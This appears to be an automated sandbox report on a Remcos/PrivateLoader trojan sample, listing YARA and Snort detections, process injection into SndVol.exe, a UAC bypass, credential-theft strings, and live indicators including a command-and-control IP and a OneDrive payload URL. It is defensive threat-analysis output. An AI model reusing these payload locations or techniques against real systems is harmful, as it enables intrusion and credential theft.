Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05384504 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	3_2_05384504
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,	4_2_00404423

Source: SndVol.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_004074FD _wcslen,CoGetObject,

3_2_004074FD

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Unpacked PE file: 0.2.HGTQP09643009.scr.exe.2900000.0.unpack

Source: HGTQP09643009.scr.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49722 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp

Spreading

Yara detected PrivateLoader

Source: Yara match	File source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_029058B4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	0_2_029058B4
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	3_2_00409253
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	3_2_0041C291
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	3_2_0040C34D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	3_2_00409665
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0044E879 FindFirstFileExA,	3_2_0044E879
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	3_2_0040880C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0040783C FindFirstFileW,FindNextFileW,	3_2_0040783C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	3_2_00419AF5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	3_2_0040BB30
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	3_2_0040BD37
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05358509 FindFirstFileW,FindNextFileW,	3_2_05358509
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0539F546 FindFirstFileExA,	3_2_0539F546
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_053594D9 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	3_2_053594D9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0535C7FD FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	3_2_0535C7FD
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0536A7C2 FindFirstFileW,	3_2_0536A7C2
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0535D01A FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	3_2_0535D01A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0535A332 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	3_2_0535A332
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05359F20 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	3_2_05359F20
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0536CF5E FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	3_2_0536CF5E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0535CA04 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	3_2_0535CA04
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_1E6C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_1E6C10F1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_1E6C6580 FindFirstFileExA,	3_2_1E6C6580
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,	4_2_0040AE51
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	7_2_00407EF8

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

3_2_00407C97

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49707 -> 107.175.229.139:8087
Source: Traffic	Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 107.175.229.139:8087 -> 192.168.2.5:49707

Yara detected PrivateLoader

Source: Yara match	File source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://onedrive.live.com/download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng
Source: Malware configuration extractor	URLs: 107.175.229.139

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Code function: 0_2_0291CF48 InternetCheckConnectionA,

0_2_0291CF48

Source: global traffic

TCP traffic: 192.168.2.5:49707 -> 107.175.229.139:8087

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 13.107.139.11 13.107.139.11
Source: Joe Sandbox View	IP Address: 107.175.229.139 107.175.229.139
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View	ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_0041B380

Source: global traffic	HTTP traffic detected: GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: SndVol.exe, 00000004.00000003.2047281585.00000000031FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: SndVol.exe, 00000004.00000003.2047281585.00000000031FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: SndVol.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: SndVol.exe, 00000003.00000002.4420280091.000000001F0E0000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: SndVol.exe, 00000003.00000002.4420280091.000000001F0E0000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: onedrive.live.com
Source: global traffic	DNS traffic detected: DNS query: 2hhi9w.am.files.1drv.com
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
